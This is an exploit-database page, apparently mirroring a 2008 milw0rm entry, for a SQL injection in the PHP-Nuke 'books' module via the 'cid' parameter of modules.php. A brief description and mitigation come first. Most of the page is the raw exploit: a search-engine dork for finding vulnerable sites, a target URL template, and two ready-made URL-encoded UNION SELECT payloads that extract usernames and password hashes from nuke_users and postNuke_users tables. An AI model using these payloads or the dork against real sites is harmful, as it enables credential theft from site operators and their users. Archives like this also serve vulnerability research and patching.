header-logo
Suggest Exploit
vendor:
N/A
by:
S@BUN
8.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-Nuke Module books SQL Injection(file)

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'cid' parameter to '/modules.php' script. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive information. Successful exploitation requires that 'magic_quotes_gpc' is disabled.

Mitigation:

Ensure that user-supplied input is properly sanitized and that 'magic_quotes_gpc' is enabled.
Source

Exploit-DB raw data:

###############################################################
#
# PHP-Nuke Module books SQL Injection(file)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: modules-php-op-modload "req view_cat"
#
###############################################################
example

http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid= {exploit}


EXPLOIT 1 :

-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201

EXPLOİT 2 :

-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201


################################################################
# S@BUN           i AM NOT HACKER                S@BUN
################################################################

# milw0rm.com [2008-02-18]